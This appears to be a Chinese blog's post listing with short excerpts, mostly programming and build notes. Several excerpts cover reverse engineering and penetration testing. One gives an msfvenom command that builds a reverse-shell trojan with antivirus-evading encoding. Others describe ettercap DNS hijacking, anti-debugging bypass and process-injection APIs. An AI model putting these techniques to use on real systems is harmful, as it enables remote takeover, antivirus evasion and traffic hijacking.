- 博客(54)
- 资源 (2)
- 收藏
- 关注
RSS订阅原创 ubuntu,jammy ,bpftrace unsolve symbol
2.为 http://ddebs.ubuntu.com 添加公钥 key。4.安装调试信息包 bpftrace。
2024-07-27 21:34:26
145
原创 VS2019 fatal error LNK1104: 无法打开文件“libboost_random-vc142-mt-gd-x32-1_72.lib”错误处理
boost库配置。
2024-07-14 00:35:38
166
原创 利用C++ onnx runtime预测训练的.pt模型
pip install ultralytics 安装 ultralytics库。下载安装好netron ,然后注册右键菜单,弄一个xx.reg ,运行一下。二:onnxruntime x86库(我是易语言,所以用x86)然后再稍微改一下类别,我的模型只有一个输入和一个输出。1.先写 py2onnx.py代码。可以查看训练好的模型的输入结构。查看模型工具netron。
2024-04-30 06:06:32
441
2
原创 yolov8 dll 编译
3.报错direct.h 不存在,用everything查找全盘,发现yolov9里面有个direct.h,直接移植到cuda的include目录就可以了。1. 每次用yolo v8 都要用python ,对于我这种写软件的太不方便了,下面尝试编译dll 调用, 我已经有做好的模型.best.pt。buld完了之后把engin.props 和 opencv.props 还有 tensor8.5.3.1 添加进C++的VS项目里面。解决:pip install ultralytics==8.0.100。
2024-04-27 01:57:46
987
1
原创 Hexin-v cookies
但是当我断下来之后第二次调试,发现断点没了,经摸索得知,每次加载的代码变量是动态变化的,于是我把代码整体抽到浏览器片段里面调试。总结: 对于混淆的代码,如果不进行AST解混淆,那么要进行调试必须得抽取代码,模拟当时环境调试。因为是在cookie里面的,所以在植入之前必定有setCookie 函数的调用。同样找到刚才这个位置,虽然混淆了,调试的时候在内存中能看到函数名hexin-v。但是多次调试之后我发现,明面上存在setcookie的都不是关键函数。这里有个关键的加密函数,它是字节码打乱了,然后还原。
2024-04-24 10:41:27
268
原创 v8引擎编译全过程
编译V8:使用ninja工具来编译V8。下载depot_tools工具,并添加到系统环境变量之中。这个必须带上,不然报错,告诉编译器win系统的模式。生成DLL:编译完成后,就得到了V8DLL。cmd 命令行需要设置成为代理模式。
2023-08-21 12:10:29
660
原创 verity cannot ... ‘/dev/block/dm-4‘ is read-only/ 证书cacerts系统目录
android 证书放进系统目录
2023-08-09 11:47:05
1567
2
原创 C++ libcurl 编译cmake imap 协议读取邮件
记得点enable_openssl,点了之后重新configure会出现,输入openssl path的选项。configure后genrate然后open project,先配置好自己的架构win32 还是x64。imap 命令太多,只要用到了需要的就够了,基本就是获取邮箱目录列表,然后选中,再多的就是个筛选,读取。github下载源码,openssl(libcurl的ssl请求需要用到)看到lib 目录里面有动态dll和静态的lib就可以了。下年进行imap 邮件登录测试。编译完成后得到下面目录。
2023-08-08 10:00:00
434
原创 某coin数据加密接口分析
MRS X8, #3, c13, c0, #2"表示将协处理器13(c13)的寄存器0(c0)的第2个字段(#2)的值读取到X8寄存器中。静态分析过,X0是传进来的参数,然后动态单步到 STUR X0, [X29,#var_30] 这里,才开始获取到传入的变量。对比在java 层的传入参数,token 和 时间戳字符串,确认这是核心加密函数 cxor。这个报错是因为我的机子是armx64,而我用的是32位的ida。下面是java 层的data 参数,比较简单,简单说一下。
2023-07-31 10:26:59
420
1
原创 水滴逆向学习笔记
virtualAllocEx 在指定进程的虚拟地址空间中保留、提交或更改内存区域的状态。该函数初始化它分配给零的内存,返回值是页面分配区域的基址。createRemoteThread 创建在另一个进程的虚拟地址空间中运行的线程,并选择性地指定扩展属性。GetFileAttributesA、GetFileAttributesExA 获得注册文件的属性。这些函数都有一个回调参数 ,回调到执行函数处是个关键破解点。VirtualProtectEx 改写页保护。HANDLE是任意对象的句柄,
2023-07-27 07:28:10
1014
原创 Objection 用法记录
查看指定方法(display)调用栈 --这里的display实际上是(类名.display),记得带上类名前缀。objection -g "包名" explore。查看内存中特定类(display)下的所有方法。hook特定类(display)的所有方法。查看内存中特定的方法(display)查看内存中特定的类(display)查看SO里面的方法并保存到json。查看可被调起的activities。查看当前hook的类。
2023-07-27 07:19:49
443
原创 wallbreaker用法记录
根据类名搜索内存中已经被创建的实例,列出 handle 和 toString() 的结果。输出类的结构, 若加了 --fullname 参数,打印的数据中类名会带着完整的包名。根据给的 pattern 对所有类名进行匹配,列出匹配到的所有类名。在 ClassDump 的基础上,输出指定对象中的每个字段的数据。
2023-07-27 07:18:31
335
原创 chrome macos编译
如果想快的话直接: fetch --nohooks --no-history chromium (我是用梯子的)我的macos 是11.3版本的,官方要求要12版本以上,无奈我只能升级了系统。有条件可以fetch chromium (完整包50+G)系统升级完重新执行,编译了我一天一夜。进入src, 配置build。
2023-07-24 07:36:50
1198
原创 猿人学第二届第一题找修改位置(非答题)
AES加密ECB-pksc7 的 key 标准是128位即 16*8(bit) ,这里666yuanrenxue66 是15位不是标准key , 我们看看它修改的算法. 搜索 _doReset。最终发现加密之前传入的铭文和key 没有被解析成字节这一步,它是直接传进去了字符串,注释掉后,我们就得到结果了,下面是根据修改位置自己改的AES.js算法调用测试。x('push')(i()) 和标准代码处理得到的结果是不一样的。调试发现这里的值每次是固定的,直接写死就好了。对比标准的AES ,修改了这里的数组。
2023-07-12 01:34:48
346
原创 json 解析chrome浏览器插件json-handle
非常好用,平常工作中需要经常查看对象属性,展开的时候往往都是很长的数据,有了这个大大提升效率了。
2023-07-08 23:42:25
810
原创 猿人学web刷题1
代码逻辑就很明显了,也就是用hex_md5(mw),mw就是传进去的时间戳,回到刚才AST解混淆之后的代码,知道得到时间戳之后还要+100000000。首页1.js 拿到 function oo0O0, 在标签里面, 无法调试,分析自己提取出来,或则hook替换。继续调试输出,结合刚才的md5 加密结尾js有一个整个。加密逻辑存在于window.a中,套娃中的套娃。经过第一个循环拿到window.b。右键遇到反调试,参考前面的文章。: url 时间戳加密。
2023-07-07 22:34:51
352
原创 js 本地替换过debug 反调试和右键屏蔽
翻到代码下面,发现是个定时器检测,触发空函数的定时器,还抹掉了debugger字眼,替换了bugger。F12 , 或则直接打开开发者工具。保存并覆盖,刷新网页,ok。然后发现被无限反调试。选择开启添加本地替换。
2023-07-07 07:33:38
204
原创 ja3指纹和akamai指纹
请求失效,带上抓包软件却可以->检测ja3浏览器指纹。方法,python 安装curl_cffi库。python 原生request。使用curl_cffi之后。可以看到结果和浏览器一样。
2023-07-07 05:28:56
318
原创 Chrome 插件开发覆写xhr请求
最开始的时候想用chrome.webRequest.onCompleted.addListener去实现拦截,注入后发现最多只能取到header信息,回调函数里面的对象并不携带responsetext的信息,如果要取到返回值还需要改写xhr请求。这几天搞chrome谷歌浏览器插件遇到个问题 我想拦截网页请求,并把数据传递到下一个子窗口。重新整理思路,改写xhr ,首先注入jquery 文件,记得在manifest.json 配置一下。上述代码并不能实现取到responsetext的功能。
2023-06-26 17:41:06
2350
原创 易语言取C++返回的文本
1.博主主要遇到的问题是没申请内存,因为C++ DLL 里面的函数返回执行完之后,临时变量是会释放内存导致,一获取不到。上篇讲了C++如何读取易语言传递的参数,现在需要读取C++返回的坐标值。调用dll之前,得在易语言申请个内存指针,存放dll 里面数据的赋值。C++ 拷贝计算好的坐标给指针的100个字节。最后拿到了opencv识别的坐标值。
2023-06-20 23:26:49
243
原创 C++读取易语言字节集图片opencv识别滑块
易语言字节集在C++中其实是字节数组的形式,这边做的是一个本地滑块识别的,识别已经实现,主要解决读入字节集的问题,因为图片的大小问题,直接传字节集恐怕不行,所以在易语言处理图片,然后在内容中C++直接用ReadProcessmemory 读取易语言内存里面变量数据,通过指针的方式传递调用。这是个多缺口滑块识别的,很多打码平台识别有问题,自己做的效果比打码平台好,经过裁剪和重定位,图中的噪音大大减少。C++读取字节集的代码如下,拿到数据之后封装成dll之后就好多了,整天拿python识别也不是个事。
2023-06-20 01:38:48
975
2
原创 JS逆向吐环境
把函数转为字符串,调用的函数环境都在这里了,然后把他们丢进(window["webpackJsonp"] = window["webpackJsonp"] || []).push([]) , 就可以用了。1.加载完成后,s=fu(t), 可以看到明显的加载器,手扣太费劲,直接输出吧。直接扣的话14万行代码,7.4m 吐完环境后2.8m ,还算可以了。这里调用时机是webpack加载器加载完成后的吐出。可以看到明显的模块函数,随便测试一个。
2023-06-12 02:06:50
1155
原创 kali linux渗透入门(3)
利用 Msfvenom 生成木马,实现远程控制1.针对不同的系统 输入不同的命令,可以在 reverse_tcp 后加上 -e x86/shikata_ga_nai -i 5 -b '0x00' 作为混淆编码,5为编码次数,次数越高可以躲掉部分杀毒软件。Linuxmsfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<Your IP...
2019-08-31 17:14:05
465
原创 kali linux渗透入门(2)
内网DNS欺骗:想知道那些劫持网页,广告投放的怎么玩,内网DNS劫持的实现如下:1.配置劫持服务dns:(1) vi /etc/ettercap/etter.dns 进入dns配置文件(2) www.baidu.com A 192.168.0.118 (攻击者服务器IP)2.开启apacha2(1) severice apacha2 start3 打开ette...
2019-08-31 12:45:31
279
原创 kali linux渗透入门(1)
对渗透感兴趣,这些天研究了一下kali,搞了个课程,在VM上搭建了个靶机:https://sourceforge.mirrorservice.org/m/me/metasploitable/Metasploitable2/对于kali的安装不做过多陈述,网上很多教程,以下把我学习到的笔记记录,更新中。1 sqlmap sql注入 ,没啥好说,id=1测试,注入,基本行不通2.ar...
2019-08-30 17:42:51
609
转载 Fiddler抓包工具总结
Fiddler抓包工具总结序章提琴手是一个蛮好用的抓包工具,可以将网络传输发送与接受的数据包进行截获,重发,编辑,转存等操作。也可以用来检测网络安全。反正好处多多,举之不尽呀!当年学习的时候也蛮费劲,一些蛮实用隐藏的小功能用了之后就忘记了,每次去网站上找也很麻烦,所以搜集各大网络的资料,总结了一些常用的功能。 Fiddler下载地址:https://www.telerik.com/...
2018-10-25 21:38:15
9150
5
转载 四种超实用的超级记忆法-数字定桩法,借助语句定桩法,标题定桩法,记忆宫殿法
菲常记忆数字生命密码表 对于数字记忆,记忆电话号码及车牌号,可以通过以下3点着手:熟悉数字编码,将简单的数字转化成图片寻找方法,即联想故事的方法建立图片与图片之间的联系案例:速记电话号码13614821452我们这样记忆:1我们不需要去记忆,36就是山鹿,14就是钥匙,82是靶儿,52是鼓儿。我们可以这样联想:有一只山鹿,手里拿着一把钥匙,拆在了一个靶子上,然后钥匙掉了下来,掉在了一个鼓儿上面...
2018-05-07 12:07:32
15152
1
转载 后缀数组
先来看一道题吧:后缀排序 - 题目这是一道模板题,就是要对一个字符串的所有后缀进行排序,并且输出排序好之后相邻的后缀的LCP长度,后缀树和后缀数组都可以,但是后缀树构造太难懂(作者太傻),只好打后缀数组了。------------------------------------------------------2016.6.10----------------------------------...
2018-05-03 14:35:10
192
转载 基数排序法
排序算法____基数排序基数排序是一种常见的算法,虽然在各个数据结构教材中都能看到,但在面试或笔试中却很少遇到。虽然知道基数排序的原理,但从未写过它的实现算法,最近看了后缀数组中用到了基数排序,又仔细研究了下,很有收获。基数排序不同于其他的排序算法,它不是基于比较的算法。基数排序是一种借助多关键字排序的思想对单逻辑关键字进行排序的方法。它是一种稳定的排序算法。多关键字排序中有两种方法:最高位优先法...
2018-05-03 13:46:26
377
转载 树状数组彻底入门
int lowbit(int t){return t&(-t);}void add(int x,int y){for(int i=x;i<=n;i+=lowbit(i))tree[i]+=y;}int getsum(int x){int ans=0;for(int i=x;i>0;i-=lowbit(i))ans+=tree[i];return ans;} 这篇笔记 会...
2018-05-03 11:30:22
142
转载 可并堆和左偏树问题解析
堆?对于堆大家想必是很熟悉的了,比如说stl里面的priority_queue就提供了方便的堆操作.当然更不必说pbds(戏称平板电视)里面的配对堆,更是Dijkstra优化的方便好手.简单的priority_queue能实现push,pop,取出top等操作...那么遇到两个堆的信息要合并的时候,我们如何实现呢?这里就是所要引出的概念——可并堆.可并堆?可并堆可以在log以内的时间复杂度合并两个...
2018-05-02 20:25:16
320
转载 数据结构01 算法的时间复杂度和空间复杂度
1、算法的概念:算法 (Algorithm),是对特定问题求解步骤的一种描述。解决一个问题往往有不止一种方法,算法也是如此。那么解决特定问题的多个算法之间如何衡量它们的优劣呢?有如下的指标:2、衡量算法的指标:(1)时间复杂度:执行这个算法需要消耗多少时间。(2)空间复杂度:这个算法需要占用多少内存空间。 同一个问题可以用不同的算法解决,而一个算法的优劣将影响到算法乃至程序的效率。算法分析的目的...
2018-05-02 19:57:55
444
转载 SSD理解
Abstract这篇文章在既保证速度,又要保证精度的情况下,提出了 SSD 物体检测模型,与现在流行的检测模型一样,将检测过程整个成一个 single deep neural network。便于训练与优化,同时提高检测速度。SSD 将输出一系列 离散化(discretization) 的 bounding boxes,这些 bounding boxes 是在 不同层次(layers) 上
2018-01-29 00:05:39
2816
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人